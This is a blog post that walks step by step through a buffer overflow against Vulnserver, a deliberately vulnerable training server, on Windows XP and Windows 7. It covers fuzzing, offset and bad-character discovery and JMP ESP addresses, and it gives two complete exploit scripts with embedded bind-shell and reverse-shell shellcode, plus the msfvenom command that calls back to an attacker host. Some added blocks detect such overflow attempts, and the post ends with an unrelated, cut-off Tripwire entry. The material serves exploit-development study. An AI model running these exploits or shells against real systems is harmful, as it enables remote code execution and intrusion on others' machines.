
Tuesday, 1 May 2018

Exploiting Vulnserver

This document is for educational purposes only; I take no responsibility for other people's actions. This is a review of Vulnserver and an exploit-writing PoC.

I had some free time, so I went back to exercising on Vulnserver. This is a short tutorial on how to write an exploit for Vulnserver on both XP SP3 and Windows 7.

The process is pretty straightforward:
1. We have to determine where the overflow happens; for this purpose we use a pattern of non-repeating characters.

#/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5050

import socket

# Place the pattern generated by pattern_create.rb here
pattern = ""

try:
    # open a connection to vulnserver
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.1.26", 9999))

    # receive the banner from vulnserver
    s.recv(1024)

    s.send("TRUN  /.:/" + pattern + " \r\n")

    # receive the response from vulnserver
    s.recv(1024)

    # close the connection
    s.close()
except socket.error:
    # if we get here the connection was closed, i.e. vulnserver crashed
    print "Socket closed"

2. To get the exact offset we search the pattern for the characters we last saw in the stack.

#/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 8co9

#[*] No exact matches, looking for likely candidates...
#[+] Possible match at offset 446 (adjusted [ little-endian: 8704 | big-endian: 19788799 ] ) byte offset 1
#[+] Possible match at offset 1226 (adjusted [ little-endian: 8448 | big-endian: 19723263 ] ) byte offset 1
#[+] Possible match at offset 2006 (adjusted [ little-endian: 8192 | big-endian: 19657727 ] ) byte offset 1
#[+] Possible match at offset 2786 (adjusted [ little-endian: 7936 | big-endian: 19592191 ] ) byte offset 1
#[+] Possible match at offset 3566 (adjusted [ little-endian: 7680 | big-endian: 19526655 ] ) byte offset 1
#[+] Possible match at offset 4346 (adjusted [ little-endian: 7424 | big-endian: 19461119 ] ) byte offset 1
#[+] Possible match at offset 5126 (adjusted [ little-endian: 7168 | big-endian: 19395583 ] ) byte offset 1
#[+] Possible match at offset 5906 (adjusted [ little-endian: 6912 | big-endian: 19330047 ] ) byte offset 1
#[+] Possible match at offset 6686 (adjusted [ little-endian: 6656 | big-endian: 19264511 ] ) byte offset 1
#[+] Possible match at offset 7466 (adjusted [ little-endian: 6400 | big-endian: 19198975 ] ) byte offset 1

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 6F43376F

[*] Exact match at offset 2002

I checked the offset manually and the exact location was 2006.

For reference this was the pattern:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9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6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2F
d3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2G
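
The two Metasploit scripts used above implement a simple scheme, and it is worth seeing it in code. The following Python 3 block is an added example, not code from the original post or from Metasploit: it regenerates the same 5050-byte pattern and looks the EIP value 0x6F43376F up the way pattern_offset.rb -q does (unpack little-endian, then search), which reproduces the 2002 reported above. The tool gives the position inside the pattern only; the author confirmed the offset actually used, 2006, by hand.

```python
import string
import struct


def pattern_create(length):
    """Metasploit-style cyclic pattern 'Aa0Aa1Aa2...Az9Ba0...' built from
    (uppercase, lowercase, digit) triplets, so every 4-byte window is unique
    for the first 20280 bytes. Same scheme as pattern_create.rb -l <length>."""
    triplets = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triplets.append(upper + lower + digit)
                if len(triplets) * 3 >= length:
                    return "".join(triplets)[:length]
    return "".join(triplets)[:length]


def pattern_offset(pattern, value):
    """Find where a crashed register's contents sit in the pattern.

    `value` may be the 32-bit register value as the debugger shows it (an int
    such as 0x6F43376F, unpacked little-endian exactly as pattern_offset.rb -q
    does) or the four characters as seen in memory (str or bytes).
    Returns the byte offset, or -1 if the value is not in the pattern."""
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("latin-1")
    elif isinstance(value, bytes):
        needle = value.decode("latin-1")
    else:
        needle = value
    return pattern.find(needle)


if __name__ == "__main__":
    p = pattern_create(5050)
    print(p[:30], "...", p[-10:])
    # 0x6F43376F is the value from the crash above; little-endian it reads "o7Co"
    print("EIP 0x6F43376F =", struct.pack("<I", 0x6F43376F).decode("latin-1"),
          "-> offset", pattern_offset(p, 0x6F43376F))
    # "8co9" cannot occur (a lowercase letter never follows a digit), hence the
    # "No exact matches" the tool printed for it
    print("8co9 -> offset", pattern_offset(p, "8co9"))
```

The lookup is a plain substring search; the "likely candidates" list pattern_offset.rb prints for a failed query is not reproduced here.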

3. After we determine the offset we have to determine the bad characters; in our case this is \x00.

We use the script below to determine a bad char:
#!/usr/bin/python
import socket
server = '192.168.1.26'
sport = 9999

prefix = 'A' * 2006
eip = 'BCDE'
# every byte value in turn; once a bad char is found, exclude it and send again
testchars = ''
for i in range(0, 256):
    testchars += chr(i)
padding = 'F' * (3000 - 2006 - 4 - len(testchars))
attack = prefix + eip + testchars + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send('TRUN .' + attack + '\r\n')
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)

s.close()

When we test with \x00 included we get an access violation at 45444342; the last thing written is BCDE, so \x00 is a bad char.

To skip \x00 we change the range of characters to (1, 256). I saw that after skipping the bad char the characters were reaching the stack.

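
The comparison the post does by eye in the debugger (the bytes sent against what actually landed on the stack) can be written down, which also makes the "exclude, resend, compare again" loop explicit. The following Python 3 block is an added example, not code from the original post. The debugger read is replaced by two constructed models of the copy so that it runs offline; against a live target `observe` would return the bytes read from the stack at the crash.

```python
def build_testchars(exclude=()):
    """Every byte value 0x00..0xff in order, minus the ones already known to be
    bad. This is the testchars loop from the script above, with an exclusion
    list instead of a hand-edited range(1, 256)."""
    excluded = set(exclude)
    return bytes(b for b in range(256) if b not in excluded)


def first_bad_char(sent, observed):
    """Compare the bytes we sent with what the debugger shows in memory after
    the copy. Returns the first byte that was altered or cut off, or None if
    the whole sequence arrived intact."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def find_all_bad_chars(observe):
    """Repeat the send/compare cycle, excluding each bad byte as it is found,
    until the sequence survives. `observe(sent)` returns the bytes seen in
    memory for that input."""
    bad = []
    while True:
        sent = build_testchars(exclude=bad)
        found = first_bad_char(sent, observe(sent))
        if found is None:
            return bad
        bad.append(found)


def simulated_copy(data):
    """Constructed stand-in for reading the stack in the debugger: models a
    C-string copy, which stops at the first NUL, so everything after it is
    lost. That matches what the post observed (the last thing written was BCDE)."""
    end = data.find(b"\x00")
    return data if end < 0 else data[:end]


def simulated_copy_lineending(data):
    """Second constructed model: a copy that also rewrites carriage returns to
    newlines, so two rounds are needed before the sequence survives."""
    return simulated_copy(data).replace(b"\r", b"\n")


if __name__ == "__main__":
    for observe in (simulated_copy, simulated_copy_lineending):
        bad = find_all_bad_chars(observe)
        print(observe.__name__, "->", ["\\x%02x" % b for b in bad])
```

Each round costs one crash of the target, which is why the exclusion list is carried over between rounds rather than restarting from all 256 values.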
4. We need an instruction that jumps to ESP, which is where our exploitation code will be placed.

For XP I used findjmp to find a jump to ESP directly in KERNEL32.DLL:
https://github.com/nickvido/littleoldearthquake/tree/master/corelan/findjmp/findjmp/bin

Both USER32 and KERNEL32 are usable:
#findjmp KERNEL32.DLL esp
#findjmp USER32.DLL esp

#Scanning KERNEL32 for code useable with the esp register
#0x7C8369F0      call esp
#0x7C86467B      jmp esp
#0x7C868667      call esp <- will use this one
#Finished Scanning KERNEL32 for code useable with the esp register

For Windows 7 I used mona to find a JMP ESP in essfunc.dll, since it is not ASLR protected:
!mona find -s "\xff\xe4" -m essfunc.dll

5. The payload:

For Windows XP I used a bind shell; this did not work on Windows 7:
#/usr/share/framework2
./msfpayload win32_bind LPORT=1313 R | ./msfencode -b "\x00"

For Windows 7 I determined that the working variant was a reverse shell with msfvenom: 

#msfvenom -p windows/shell_reverse_tcp LHOST="192.168.1.15" LPORT=4444 -f c -a x86 -b '\x00' 


Exploit for Vulnserver on Windows XP:
import socket

#SER_ADDR = input('Type the server IP address: ')
#SER_PORT = int(input('Type the server port: '))

SER_ADDR = '192.168.1.27'
SER_PORT = 9999

my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_sock.connect((SER_ADDR, SER_PORT))
print('Connection established')

data = my_sock.recv(1024)
#Possible Registers for usage on XP SP3
#https://github.com/nickvido/littleoldearthquake/tree/master/corelan/findjmp/findjmp/bin
#findjmp KERNEL32.DLL esp
#findjmp USER32.DLL esp
#Scanning KERNEL32 for code useable with the esp register
#0x7C8369F0      call esp
#0x7C86467B      jmp esp
#0x7C868667      call esp <- will use this one
#Finished Scanning KERNEL32 for code useable with the esp register
message = '\x41' * 2006 + '\x67\x86\x86\x7c' #CALL ESP that we chose
message += '\x90' * 16

#/usr/share/framework2
#./msfpayload win32_bind LPORT=1313 R | ./msfencode -b "\x00"
message +=(
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xef\x4d\x96"
"\x95\x83\xeb\xfc\xe2\xf4\x13\x27\x7d\xd8\x07\xb4\x69\x6a\x10\x2d"
"\x1d\xf9\xcb\x69\x1d\xd0\xd3\xc6\xea\x90\x97\x4c\x79\x1e\xa0\x55"
"\x1d\xca\xcf\x4c\x7d\xdc\x64\x79\x1d\x94\x01\x7c\x56\x0c\x43\xc9"
"\x56\xe1\xe8\x8c\x5c\x98\xee\x8f\x7d\x61\xd4\x19\xb2\xbd\x9a\xa8"
"\x1d\xca\xcb\x4c\x7d\xf3\x64\x41\xdd\x1e\xb0\x51\x97\x7e\xec\x61"
"\x1d\x1c\x83\x69\x8a\xf4\x2c\x7c\x4d\xf1\x64\x0e\xa6\x1e\xaf\x41"
"\x1d\xe5\xf3\xe0\x1d\xd5\xe7\x13\xfe\x1b\xa1\x43\x7a\xc5\x10\x9b"
"\xf0\xc6\x89\x25\xa5\xa7\x87\x3a\xe5\xa7\xb0\x19\x69\x45\x87\x86"
"\x7b\x69\xd4\x1d\x69\x43\xb0\xc4\x73\xf3\x6e\xa0\x9e\x97\xba\x27"
"\x94\x6a\x3f\x25\x4f\x9c\x1a\xe0\xc1\x6a\x39\x1e\xc5\xc6\xbc\x1e"
"\xd5\xc6\xac\x1e\x69\x45\x89\x25\x93\xb4\x89\x1e\x1f\x74\x7a\x25"
"\x32\x8f\x9f\x8a\xc1\x6a\x39\x27\x86\xc4\xba\xb2\x46\xfd\x4b\xe0"
"\xb8\x7c\xb8\xb2\x40\xc6\xba\xb2\x46\xfd\x0a\x04\x10\xdc\xb8\xb2"
"\x40\xc5\xbb\x19\xc3\x6a\x3f\xde\xfe\x72\x96\x8b\xef\xc2\x10\x9b"
"\xc3\x6a\x3f\x2b\xfc\xf1\x89\x25\xf5\xf8\x66\xa8\xfc\xc5\xb6\x64"
"\x5a\x1c\x08\x27\xd2\x1c\x0d\x7c\x56\x66\x45\xb3\xd4\xb8\x11\x0f"
"\xba\x06\x62\x37\xae\x3e\x44\xe6\xfe\xe7\x11\xfe\x80\x6a\x9a\x09"
"\x69\x43\xb4\x1a\xc4\xc4\xbe\x1c\xfc\x94\xbe\x1c\xc3\xc4\x10\x9d"
"\xfe\x38\x36\x48\x58\xc6\x10\x9b\xfc\x6a\x10\x7a\x69\x45\x64\x1a"
"\x6a\x16\x2b\x29\x69\x43\xbd\xb2\x46\xfd\x1f\xc7\x92\xca\xbc\xb2"
"\x40\x6a\x3f\x4d\x96\x95")

my_sock.send(('TRUN .' + message + '\r\n'))

print my_sock.recv(1024)
my_sock.send('EXIT\r\n')
print my_sock.recv(1024)
my_sock.close()

Exploit for Vulnserver on Windows 7:
import socket

#SER_ADDR = input('Type the server IP address: ')
#SER_PORT = int(input('Type the server port: '))

SER_ADDR = '192.168.1.26'
SER_PORT = 9999

my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_sock.connect((SER_ADDR, SER_PORT))
print('Connection established')

data = my_sock.recv(1024)

prefix = '\x41' * 2006
esp = '\xaf\x11\x50\x62' #CALL ESP that we chose
nopsled = '\x90' * 16

#!mona find -s "\xff\xe4" -m essfunc.dll
#msfvenom -p windows/shell_reverse_tcp LHOST="192.168.1.15" LPORT=4444 -f c -a x86 -b '\x00' <-works
payload =(
"\xdd\xc5\xd9\x74\x24\xf4\xb8\x84\x6e\x28\xf3\x5a\x33\xc9\xb1"
"\x52\x31\x42\x17\x03\x42\x17\x83\x46\x6a\xca\x06\xba\x9b\x88"
"\xe9\x42\x5c\xed\x60\xa7\x6d\x2d\x16\xac\xde\x9d\x5c\xe0\xd2"
"\x56\x30\x10\x60\x1a\x9d\x17\xc1\x91\xfb\x16\xd2\x8a\x38\x39"
"\x50\xd1\x6c\x99\x69\x1a\x61\xd8\xae\x47\x88\x88\x67\x03\x3f"
"\x3c\x03\x59\xfc\xb7\x5f\x4f\x84\x24\x17\x6e\xa5\xfb\x23\x29"
"\x65\xfa\xe0\x41\x2c\xe4\xe5\x6c\xe6\x9f\xde\x1b\xf9\x49\x2f"
"\xe3\x56\xb4\x9f\x16\xa6\xf1\x18\xc9\xdd\x0b\x5b\x74\xe6\xc8"
"\x21\xa2\x63\xca\x82\x21\xd3\x36\x32\xe5\x82\xbd\x38\x42\xc0"
"\x99\x5c\x55\x05\x92\x59\xde\xa8\x74\xe8\xa4\x8e\x50\xb0\x7f"
"\xae\xc1\x1c\xd1\xcf\x11\xff\x8e\x75\x5a\x12\xda\x07\x01\x7b"
"\x2f\x2a\xb9\x7b\x27\x3d\xca\x49\xe8\x95\x44\xe2\x61\x30\x93"
"\x05\x58\x84\x0b\xf8\x63\xf5\x02\x3f\x37\xa5\x3c\x96\x38\x2e"
"\xbc\x17\xed\xe1\xec\xb7\x5e\x42\x5c\x78\x0f\x2a\xb6\x77\x70"
"\x4a\xb9\x5d\x19\xe1\x40\x36\xe6\x5e\x4b\xc9\x8e\x9c\x4b\xc4"
"\x12\x28\xad\x8c\xba\x7c\x66\x39\x22\x25\xfc\xd8\xab\xf3\x79"
"\xda\x20\xf0\x7e\x95\xc0\x7d\x6c\x42\x21\xc8\xce\xc5\x3e\xe6"
"\x66\x89\xad\x6d\x76\xc4\xcd\x39\x21\x81\x20\x30\xa7\x3f\x1a"
"\xea\xd5\xbd\xfa\xd5\x5d\x1a\x3f\xdb\x5c\xef\x7b\xff\x4e\x29"
"\x83\xbb\x3a\xe5\xd2\x15\x94\x43\x8d\xd7\x4e\x1a\x62\xbe\x06"
"\xdb\x48\x01\x50\xe4\x84\xf7\xbc\x55\x71\x4e\xc3\x5a\x15\x46"
"\xbc\x86\x85\xa9\x17\x03\xb5\xe3\x35\x22\x5e\xaa\xac\x76\x03"
"\x4d\x1b\xb4\x3a\xce\xa9\x45\xb9\xce\xd8\x40\x85\x48\x31\x39"
"\x96\x3c\x35\xee\x97\x14"
)

message = prefix + esp + nopsled + payload + 'C' * (3000-len(prefix)-len(esp)-len(nopsled)-len(payload))
my_sock.send(('TRUN .' + message + '\r\n'))

print my_sock.recv(1024)
my_sock.send('EXIT\r\n')
print my_sock.recv(1024)
my_sock.close()
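
The scripts above show exactly what an overflow of the TRUN handler looks like on the wire, and the same knowledge serves the defender. The following Python 3 block is an added example, not part of the original post: it parses captured vulnserver requests and flags the traits of an overflow attempt (an oversized argument, non-printable bytes, a NOP run). The 1024-byte limit and the sample capture are constructed for this example.

```python
import re

# Assumption for this example: the post found the saved return address 2006
# bytes into the TRUN argument, so anything approaching that is suspicious and
# normal use of the training server needs far less.
MAX_ARG_LEN = 1024

# vulnserver requests are 'COMMAND argument\r\n'
REQUEST_RE = re.compile(rb"^([A-Z]+)[ ]*(.*?)\r\n$", re.DOTALL)


def parse_request(raw):
    """Split a raw request into (command, argument bytes); None if it is not
    CRLF-terminated."""
    m = REQUEST_RE.match(raw)
    if not m:
        return None
    return m.group(1).decode("ascii"), m.group(2)


def inspect_request(raw):
    """Findings for one captured request; an empty list means it looks benign."""
    parsed = parse_request(raw)
    if parsed is None:
        return ["malformed request (no CRLF terminator)"]
    cmd, arg = parsed
    findings = []
    if len(arg) > MAX_ARG_LEN:
        findings.append("%s: argument is %d bytes (limit %d)" % (cmd, len(arg), MAX_ARG_LEN))
    non_printable = sum(1 for b in arg if b < 0x20 or b > 0x7e)
    if non_printable:
        findings.append("%s: %d non-printable bytes in argument" % (cmd, non_printable))
    if b"\x90" * 8 in arg:
        findings.append("%s: run of 0x90 bytes (NOP sled) in argument" % cmd)
    return findings


def scan(requests):
    """Inspect a sequence of captured requests; returns {index: findings} for
    the flagged ones only."""
    flagged = {}
    for i, raw in enumerate(requests):
        findings = inspect_request(raw)
        if findings:
            flagged[i] = findings
    return flagged


# Constructed sample capture: two benign requests and one shaped like the
# overflow above (filler, a placeholder 4-byte address, a NOP sled; no shellcode).
SAMPLE_REQUESTS = [
    b"TRUN .hello\r\n",
    b"EXIT\r\n",
    b"TRUN ." + b"A" * 2006 + b"\xde\xad\xbe\xef" + b"\x90" * 16 + b"\r\n",
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_REQUESTS).items():
        for f in findings:
            print("request %d: %s" % (index, f))
```

The three checks are independent on purpose: an encoder (the msfencode/msfvenom -b '\x00' runs above) changes the bytes of the payload but not the length of the message, so the length rule still fires when the others are evaded.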

Friday, 27 April 2018

Installing Tripwire on Suse

First we have to get tripwire:

In my case:
